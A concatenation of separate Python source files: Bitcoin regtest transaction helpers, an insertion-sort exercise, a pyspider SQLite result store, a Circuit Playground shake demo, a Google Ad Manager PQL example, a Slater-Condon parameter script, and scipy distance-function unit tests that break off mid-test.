inputs.append({"txid": t["txid"], "vout": t["vout"], "address": t["address"]})
if total_in < amount_needed:
raise RuntimeError("Insufficient funds: need %d, have %d" % (amount_needed, total_in))
return (total_in, inputs)
def make_change(from_node, amount_in, amount_out, fee):
"""
Create change output(s), return them
"""
outputs = {}
amount = amount_out + fee
change = amount_in - amount
if change > amount * 2:
# Create an extra change output to break up big inputs
change_address = from_node.getnewaddress()
# Split change in two, being careful of rounding:
outputs[change_address] = Decimal(change / 2).quantize(Decimal('0.00000001'), rounding=ROUND_DOWN)
change = amount_in - amount - outputs[change_address]
if change > 0:
outputs[from_node.getnewaddress()] = change
return outputs
def random_transaction(nodes, amount, min_fee, fee_increment, fee_variants):
"""
Create a random transaction.
Returns (txid, hex-encoded-transaction-data, fee)
"""
from_node = random.choice(nodes)
to_node = random.choice(nodes)
fee = min_fee + fee_increment * random.randint(0, fee_variants)
(total_in, inputs) = gather_inputs(from_node, amount + fee)
outputs = make_change(from_node, total_in, amount, fee)
outputs[to_node.getnewaddress()] = float(amount)
rawtx = from_node.createrawtransaction(inputs, outputs)
signresult = from_node.signrawtransaction(rawtx)
txid = from_node.sendrawtransaction(signresult["hex"], True)
return (txid, signresult["hex"], fee)
# Helper to create at least "count" utxos
# Pass in a fee that is sufficient for relay and mining new transactions.
def create_confirmed_utxos(fee, node, count):
to_generate = int(0.5 * count) + 101
while to_generate > 0:
node.generate(min(25, to_generate))
to_generate -= 25
utxos = node.listunspent()
iterations = count - len(utxos)
addr1 = node.getnewaddress()
addr2 = node.getnewaddress()
if iterations <= 0:
return utxos
for i in range(iterations):
t = utxos.pop()
inputs = []
inputs.append({"txid": t["txid"], "vout": t["vout"]})
outputs = {}
send_value = t['amount'] - fee
outputs[addr1] = float(satoshi_round(send_value / 2))
outputs[addr2] = float(satoshi_round(send_value / 2))
raw_tx = node.createrawtransaction(inputs, outputs)
signed_tx = node.signrawtransaction(raw_tx)["hex"]
node.sendrawtransaction(signed_tx)
while (node.getmempoolinfo()['size'] > 0):
node.generate(1)
utxos = node.listunspent()
assert(len(utxos) >= count)
return utxos
# Create large OP_RETURN txouts that can be appended to a transaction
# to make it large (helper for constructing large transactions).
def gen_return_txouts():
# Some pre-processing to create a bunch of OP_RETURN txouts to insert into transactions we create
# So we have big transactions (and therefore can't fit very many into each block)
# create one script_pubkey
script_pubkey = "6a4d0200" # OP_RETURN OP_PUSH2 512 bytes
for i in range(512):
script_pubkey = script_pubkey + "01"
# concatenate 128 txouts of above script_pubkey which we'll insert before the txout for change
txouts = "81"
for k in range(128):
# add txout value
txouts = txouts + "0000000000000000"
# add length of script_pubkey
txouts = txouts + "fd0402"
# add script_pubkey
txouts = txouts + script_pubkey
return txouts
def create_tx(node, coinbase, to_address, amount):
inputs = [{"txid": coinbase, "vout": 0}]
outputs = {to_address: amount}
rawtx = node.createrawtransaction(inputs, outputs)
signresult = node.signrawtransaction(rawtx)
assert_equal(signresult["complete"], True)
return signresult["hex"]
# Create a spend of each passed-in utxo, splicing in "txouts" to each raw
# transaction to make it large. See gen_return_txouts() above.
def create_lots_of_big_transactions(node, txouts, utxos, num, fee):
addr = node.getnewaddress()
txids = []
for _ in range(num):
t = utxos.pop()
inputs = [{"txid": t["txid"], "vout": t["vout"]}]
outputs = {}
change = t['amount'] - fee
outputs[addr] = float(satoshi_round(change))
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + txouts
newtx = newtx + rawtx[94:]
signresult = node.signrawtransaction(newtx, None, None, "NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
txids.append(txid)
return txids
def mine_large_block(node, utxos=None):
# generate a 66k transaction,
# and 14 of them is close to the 1MB block limit
num = 14
txouts = gen_return_txouts()
utxos = utxos if utxos is not None else []
if len(utxos) < num:
utxos.clear()
utxos.extend(node.listunspent())
fee = 100 * node.getnetworkinfo()["relayfee"]
create_lots_of_big_transactions(node, txouts, utxos, num, fee=fee)
node.generate(1)
|
##Question 16
##Implement insertion sort in python. Don’t use Python’s built in sort or sorted.
##Make classes for a node, with pointers for next
##Assume your inputs will be sufficient for the memory you have.
##Example inputs
##>>> 11,127,56,2,1,5,7,9,11,65,12,24,76,87,123,65,8,32,86,123,67,1,67,92,72,39,49,12
##>>> 98,52,45,19,37,22,1,66,943,415,21,785,12,698,26,36,18,97,0,63,25,85,24,94,1501
def insert_sort(alist):
""" Fuction to sort a given list a """
for i in range(0, len(alist)-1):
current = i+1
while current :
###if the current number is lesser than the number on left than swap values
if alist[current] < alist[i]:
alist[current], alist[i] = alist[i], alist[current]
print alist
current = current - 1
i = i - 1
return alist
print insert_sort([11,126,54,2,1,65,24,77,93,31,44,55,20])
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
# vim: set et sw=4 ts=4 sts=4 ff=unix fenc=utf8:
# Author: Binux<i@binux.me>
# http://binux.me
# Created on 2014-10-13 17:08:43
import re
import time
import json
from .sqlitebase import SQLiteMixin, SplitTableMixin
from pyspider.database.base.resultdb import ResultDB as BaseResultDB
from pyspider.database.basedb import BaseDB
class ResultDB(SQLiteMixin, SplitTableMixin, BaseResultDB, BaseDB):
__tablename__ = 'resultdb'
placeholder = '?'
def __init__(self, path):
self.path = path
self.last_pid = 0
self.conn = None
self._list_project()
def _create_project(self, project):
assert re.match(r'^\w+$', project) is not None
tablename = self._tablename(project)
self._execute('''CREATE TABLE IF NOT EXISTS `%s` (
taskid PRIMARY KEY,
url,
result,
updatetime
)''' % tablename)
def _parse(self, data):
if 'result' in data:
data['result'] = json.loads(data['result'])
return data
def _stringify(self, data):
if 'result' in data:
data['result'] = json.dumps(data['result'])
return data
def save(self, project, taskid, url, result):
tablename = self._tablename(project)
if project not in self.projects:
self._create_project(project)
self._list_project()
obj = {
'taskid': taskid,
'url': url,
'result': result,
'updatetime': time.time(),
}
return self._replace(tablename, **self._stringify(obj))
def select(self, project, fields=None, offset=0, limit=None):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return
tablename = self._tablename(project)
for task in self._select2dic(tablename, what=fields, order='updatetime DESC',
offset=offset, limit=limit):
yield self._parse(task)
def count(self, project):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return 0
tablename = self._tablename(project)
for count, in self._execute("SELECT count(1) FROM %s" % self.escape(tablename)):
return count
def get(self, project, taskid, fields=None):
if project not in self.projects:
self._list_project()
if project not in self.projects:
return
tablename = self._tablename(project)
where = "`taskid` = %s" % self.placeholder
for task in self._select2dic(tablename, what=fields,
where=where, where_values=(taskid, )):
return self._parse(task)
|
from adafruit_circuitplayground.express import cpx
while True:
if cpx.shake():
print("Shake detected!")
cpx.red_led = True
else:
cpx.red_led = False
|
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example fetches data from PQL tables and creates match table files."""
import tempfile
# Import appropriate modules from the client library.
from googleads import ad_manager
def main(client):
# Initialize a report downloader.
report_downloader = client.GetDataDownloader(version='v201902')
line_items_file = tempfile.NamedTemporaryFile(
prefix='line_items_', suffix='.csv', mode='w', delete=False)
ad_units_file = tempfile.NamedTemporaryFile(
prefix='ad_units_', suffix='.csv', mode='w', delete=False)
line_items_pql_query = ('SELECT Name, Id, Status FROM Line_Item ORDER BY Id '
'ASC')
ad_units_pql_query = 'SELECT Name, Id FROM Ad_Unit ORDER BY Id ASC'
# Downloads the response from PQL select statement to the specified file
report_downloader.DownloadPqlResultToCsv(
line_items_pql_query, line_items_file)
report_downloader.DownloadPqlResultToCsv(
ad_units_pql_query, ad_units_file)
line_items_file.close()
ad_units_file.close()
print 'Saved line items to... %s' % line_items_file.name
print 'Saved ad units to... %s' % ad_units_file.name
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client)
|
#!/usr/bin/env python
import argparse
import numpy as np
import os, sys, shutil, subprocess, glob
import os.path
from numpy import pi
from scipy import *
def main(options):
problem=options.subshell
uval=float(options.uval)
jval=float(options.jval)
if (problem=='s'):
F0=uval
print('F0=', F0)
elif (problem=='p'):
F0=uval
F2=5*jval
print('F0=', F0)
print('F2=', F2)
elif (problem=='d'):
F0=uval
F2=14.0/1.625*jval
F4=8.75/1.625*jval
print('F0=', F0)
print('F2=', F2)
print('F4=', F4)
elif (problem=='f'):
F0=uval
F2=6435.0/(286+195*0.668+250*0.494)*jval
F4=0.668*F2
F6=0.494*F2
print('F0=', F0)
print('F2=', F2)
print('F4=', F4)
print('F6=', F6)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='calculate slater-condon parameters with inputs of U and J')
parser.add_argument('subshell', action='store', help='subshell either s, p, d or f')
parser.add_argument('uval', action='store', help='U value in eV')
parser.add_argument('jval', action='store', help='J value in eV')
options = parser.parse_args()
main(options)
|
#! /usr/bin/env python
#
# Author: Damian Eads
# Date: April 17, 2008
#
# Copyright (C) 2008 Damian Eads
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# 3. The name of the author may not be used to endorse or promote
# products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
# OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE
# GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from __future__ import division, print_function, absolute_import
import os.path
from scipy._lib.six import xrange, u
import numpy as np
from numpy.linalg import norm
from numpy.testing import (verbose, TestCase, run_module_suite, assert_,
assert_raises, assert_array_equal, assert_equal, assert_almost_equal,
assert_allclose)
from scipy.spatial.distance import (squareform, pdist, cdist, matching,
jaccard, dice, sokalsneath, rogerstanimoto, russellrao, yule,
num_obs_y, num_obs_dm, is_valid_dm, is_valid_y, minkowski, wminkowski,
euclidean, sqeuclidean, cosine, correlation, hamming, mahalanobis,
canberra, braycurtis, sokalmichener, _validate_vector)
_filenames = ["iris.txt",
"cdist-X1.txt",
"cdist-X2.txt",
"pdist-hamming-ml.txt",
"pdist-boolean-inp.txt",
"pdist-jaccard-ml.txt",
"pdist-cityblock-ml-iris.txt",
"pdist-minkowski-3.2-ml-iris.txt",
"pdist-cityblock-ml.txt",
"pdist-correlation-ml-iris.txt",
"pdist-minkowski-5.8-ml-iris.txt",
"pdist-correlation-ml.txt",
"pdist-minkowski-3.2-ml.txt",
"pdist-cosine-ml-iris.txt",
"pdist-seuclidean-ml-iris.txt",
"pdist-cosine-ml.txt",
"pdist-seuclidean-ml.txt",
"pdist-double-inp.txt",
"pdist-spearman-ml.txt",
"pdist-euclidean-ml.txt",
"pdist-euclidean-ml-iris.txt",
"pdist-chebychev-ml.txt",
"pdist-chebychev-ml-iris.txt",
"random-bool-data.txt"]
_tdist = np.array([[0, 662, 877, 255, 412, 996],
[662, 0, 295, 468, 268, 400],
[877, 295, 0, 754, 564, 138],
[255, 468, 754, 0, 219, 869],
[412, 268, 564, 219, 0, 669],
[996, 400, 138, 869, 669, 0]], dtype='double')
_ytdist = squareform(_tdist)
# A hashmap of expected output arrays for the tests. These arrays
# come from a list of text files, which are read prior to testing.
# Each test loads inputs and outputs from this dictionary.
eo = {}
def load_testing_files():
for fn in _filenames:
name = fn.replace(".txt", "").replace("-ml", "")
fqfn = os.path.join(os.path.dirname(__file__), 'data', fn)
fp = open(fqfn)
eo[name] = np.loadtxt(fp)
fp.close()
eo['pdist-boolean-inp'] = np.bool_(eo['pdist-boolean-inp'])
load_testing_files()
class TestCdist(TestCase):
def test_cdist_euclidean_random(self):
eps = 1e-07
# Get the data: the input matrix and the right output.
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'euclidean')
Y2 = cdist(X1, X2, 'test_euclidean')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_euclidean_random_unicode(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, u('euclidean'))
Y2 = cdist(X1, X2, u('test_euclidean'))
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_sqeuclidean_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'sqeuclidean')
Y2 = cdist(X1, X2, 'test_sqeuclidean')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_cityblock_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'cityblock')
Y2 = cdist(X1, X2, 'test_cityblock')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_hamming_double_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'hamming')
Y2 = cdist(X1, X2, 'test_hamming')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_hamming_bool_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'hamming')
Y2 = cdist(X1, X2, 'test_hamming')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_jaccard_double_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'jaccard')
Y2 = cdist(X1, X2, 'test_jaccard')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_jaccard_bool_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'jaccard')
Y2 = cdist(X1, X2, 'test_jaccard')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_chebychev_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'chebychev')
Y2 = cdist(X1, X2, 'test_chebychev')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_minkowski_random_p3d8(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'minkowski', p=3.8)
Y2 = cdist(X1, X2, 'test_minkowski', p=3.8)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_minkowski_random_p4d6(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'minkowski', p=4.6)
Y2 = cdist(X1, X2, 'test_minkowski', p=4.6)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_minkowski_random_p1d23(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'minkowski', p=1.23)
Y2 = cdist(X1, X2, 'test_minkowski', p=1.23)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_wminkowski_random_p3d8(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
w = 1.0 / X1.std(axis=0)
Y1 = cdist(X1, X2, 'wminkowski', p=3.8, w=w)
Y2 = cdist(X1, X2, 'test_wminkowski', p=3.8, w=w)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_wminkowski_int_weights(self):
# regression test when using integer weights
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
w = np.arange(X1.shape[1])
Y1 = cdist(X1, X2, 'wminkowski', p=3.8, w=w)
Y2 = cdist(X1, X2, 'test_wminkowski', p=3.8, w=w)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_wminkowski_random_p4d6(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
w = 1.0 / X1.std(axis=0)
Y1 = cdist(X1, X2, 'wminkowski', p=4.6, w=w)
Y2 = cdist(X1, X2, 'test_wminkowski', p=4.6, w=w)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_wminkowski_random_p1d23(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
w = 1.0 / X1.std(axis=0)
Y1 = cdist(X1, X2, 'wminkowski', p=1.23, w=w)
Y2 = cdist(X1, X2, 'test_wminkowski', p=1.23, w=w)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_seuclidean_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'seuclidean')
Y2 = cdist(X1, X2, 'test_seuclidean')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_cosine_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'cosine')
# Naive implementation
def norms(X):
# NumPy 1.7: np.linalg.norm(X, axis=1).reshape(-1, 1)
return np.asarray([np.linalg.norm(row)
for row in X]).reshape(-1, 1)
Y2 = 1 - np.dot((X1 / norms(X1)), (X2 / norms(X2)).T)
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_correlation_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'correlation')
Y2 = cdist(X1, X2, 'test_correlation')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_mahalanobis_random(self):
eps = 1e-07
X1 = eo['cdist-X1']
X2 = eo['cdist-X2']
Y1 = cdist(X1, X2, 'mahalanobis')
Y2 = cdist(X1, X2, 'test_mahalanobis')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_canberra_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'canberra')
Y2 = cdist(X1, X2, 'test_canberra')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_braycurtis_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'braycurtis')
Y2 = cdist(X1, X2, 'test_braycurtis')
if verbose > 2:
print(Y1, Y2)
print((Y1-Y2).max())
_assert_within_tol(Y1, Y2, eps)
def test_cdist_yule_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'yule')
Y2 = cdist(X1, X2, 'test_yule')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_matching_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'matching')
Y2 = cdist(X1, X2, 'test_matching')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_kulsinski_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'kulsinski')
Y2 = cdist(X1, X2, 'test_kulsinski')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_dice_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'dice')
Y2 = cdist(X1, X2, 'test_dice')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_rogerstanimoto_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'rogerstanimoto')
Y2 = cdist(X1, X2, 'test_rogerstanimoto')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_russellrao_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'russellrao')
Y2 = cdist(X1, X2, 'test_russellrao')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_sokalmichener_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'sokalmichener')
Y2 = cdist(X1, X2, 'test_sokalmichener')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
def test_cdist_sokalsneath_random(self):
eps = 1e-07
X1 = eo['cdist-X1'] < 0.5
X2 = eo['cdist-X2'] < 0.5
Y1 = cdist(X1, X2, 'sokalsneath')
Y2 = cdist(X1, X2, 'test_sokalsneath')
_assert_within_tol(Y1, Y2, eps, verbose > 2)
class TestPdist(TestCase):
def test_pdist_euclidean_random(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-euclidean']
Y_test1 = pdist(X, 'euclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_euclidean_random_u(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-euclidean']
Y_test1 = pdist(X, u('euclidean'))
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_euclidean_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-euclidean']
Y_test1 = pdist(X, 'euclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_euclidean_random_nonC(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-euclidean']
Y_test2 = pdist(X, 'test_euclidean')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_euclidean_iris_double(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-euclidean-iris']
Y_test1 = pdist(X, 'euclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_euclidean_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-euclidean-iris']
Y_test1 = pdist(X, 'euclidean')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_euclidean_iris_nonC(self):
# Test pdist(X, 'test_euclidean') [the non-C implementation] on the
# Iris data set.
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-euclidean-iris']
Y_test2 = pdist(X, 'test_euclidean')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_seuclidean_random(self):
eps = 1e-05
X = eo['pdist-double-inp']
Y_right = eo['pdist-seuclidean']
Y_test1 = pdist(X, 'seuclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_seuclidean_random_float32(self):
eps = 1e-05
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-seuclidean']
Y_test1 = pdist(X, 'seuclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_seuclidean_random_nonC(self):
# Test pdist(X, 'test_sqeuclidean') [the non-C implementation]
eps = 1e-05
X = eo['pdist-double-inp']
Y_right = eo['pdist-seuclidean']
Y_test2 = pdist(X, 'test_sqeuclidean')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_seuclidean_iris(self):
eps = 1e-05
X = eo['iris']
Y_right = eo['pdist-seuclidean-iris']
Y_test1 = pdist(X, 'seuclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_seuclidean_iris_float32(self):
# Tests pdist(X, 'seuclidean') on the Iris data set (float32).
eps = 1e-05
X = np.float32(eo['iris'])
Y_right = eo['pdist-seuclidean-iris']
Y_test1 = pdist(X, 'seuclidean')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_seuclidean_iris_nonC(self):
# Test pdist(X, 'test_seuclidean') [the non-C implementation] on the
# Iris data set.
eps = 1e-05
X = eo['iris']
Y_right = eo['pdist-seuclidean-iris']
Y_test2 = pdist(X, 'test_sqeuclidean')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_cosine_random(self):
eps = 1e-08
X = eo['pdist-double-inp']
Y_right = eo['pdist-cosine']
Y_test1 = pdist(X, 'cosine')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cosine_random_float32(self):
eps = 1e-08
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-cosine']
Y_test1 = pdist(X, 'cosine')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cosine_random_nonC(self):
# Test pdist(X, 'test_cosine') [the non-C implementation]
eps = 1e-08
X = eo['pdist-double-inp']
Y_right = eo['pdist-cosine']
Y_test2 = pdist(X, 'test_cosine')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_cosine_iris(self):
eps = 1e-08
X = eo['iris']
Y_right = eo['pdist-cosine-iris']
Y_test1 = pdist(X, 'cosine')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cosine_iris_float32(self):
eps = 1e-07
X = np.float32(eo['iris'])
Y_right = eo['pdist-cosine-iris']
Y_test1 = pdist(X, 'cosine')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_cosine_iris_nonC(self):
eps = 1e-08
X = eo['iris']
Y_right = eo['pdist-cosine-iris']
Y_test2 = pdist(X, 'test_cosine')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_cityblock_random(self):
eps = 1e-06
X = eo['pdist-double-inp']
Y_right = eo['pdist-cityblock']
Y_test1 = pdist(X, 'cityblock')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cityblock_random_float32(self):
eps = 1e-06
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-cityblock']
Y_test1 = pdist(X, 'cityblock')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cityblock_random_nonC(self):
eps = 1e-06
X = eo['pdist-double-inp']
Y_right = eo['pdist-cityblock']
Y_test2 = pdist(X, 'test_cityblock')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_cityblock_iris(self):
eps = 1e-14
X = eo['iris']
Y_right = eo['pdist-cityblock-iris']
Y_test1 = pdist(X, 'cityblock')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_cityblock_iris_float32(self):
eps = 1e-06
X = np.float32(eo['iris'])
Y_right = eo['pdist-cityblock-iris']
Y_test1 = pdist(X, 'cityblock')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_cityblock_iris_nonC(self):
# Test pdist(X, 'test_cityblock') [the non-C implementation] on the
# Iris data set.
eps = 1e-14
X = eo['iris']
Y_right = eo['pdist-cityblock-iris']
Y_test2 = pdist(X, 'test_cityblock')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_correlation_random(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-correlation']
Y_test1 = pdist(X, 'correlation')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_correlation_random_float32(self):
eps = 1e-07
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-correlation']
Y_test1 = pdist(X, 'correlation')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_correlation_random_nonC(self):
eps = 1e-07
X = eo['pdist-double-inp']
Y_right = eo['pdist-correlation']
Y_test2 = pdist(X, 'test_correlation')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_correlation_iris(self):
eps = 1e-08
X = eo['iris']
Y_right = eo['pdist-correlation-iris']
Y_test1 = pdist(X, 'correlation')
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_correlation_iris_float32(self):
eps = 1e-07
X = eo['iris']
Y_right = np.float32(eo['pdist-correlation-iris'])
Y_test1 = pdist(X, 'correlation')
_assert_within_tol(Y_test1, Y_right, eps, verbose > 2)
def test_pdist_correlation_iris_nonC(self):
eps = 1e-08
X = eo['iris']
Y_right = eo['pdist-correlation-iris']
Y_test2 = pdist(X, 'test_correlation')
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_minkowski_random(self):
eps = 1e-05
X = eo['pdist-double-inp']
Y_right = eo['pdist-minkowski-3.2']
Y_test1 = pdist(X, 'minkowski', 3.2)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_random_float32(self):
eps = 1e-05
X = np.float32(eo['pdist-double-inp'])
Y_right = eo['pdist-minkowski-3.2']
Y_test1 = pdist(X, 'minkowski', 3.2)
_assert_within_tol(Y_test1, Y_right, eps)
def test_pdist_minkowski_random_nonC(self):
eps = 1e-05
X = eo['pdist-double-inp']
Y_right = eo['pdist-minkowski-3.2']
Y_test2 = pdist(X, 'test_minkowski', 3.2)
_assert_within_tol(Y_test2, Y_right, eps)
def test_pdist_minkowski_3_2_iris(self):
eps = 1e-07
X = eo['iris']
Y_right = eo['pdist-minkowski-3.2-iris']
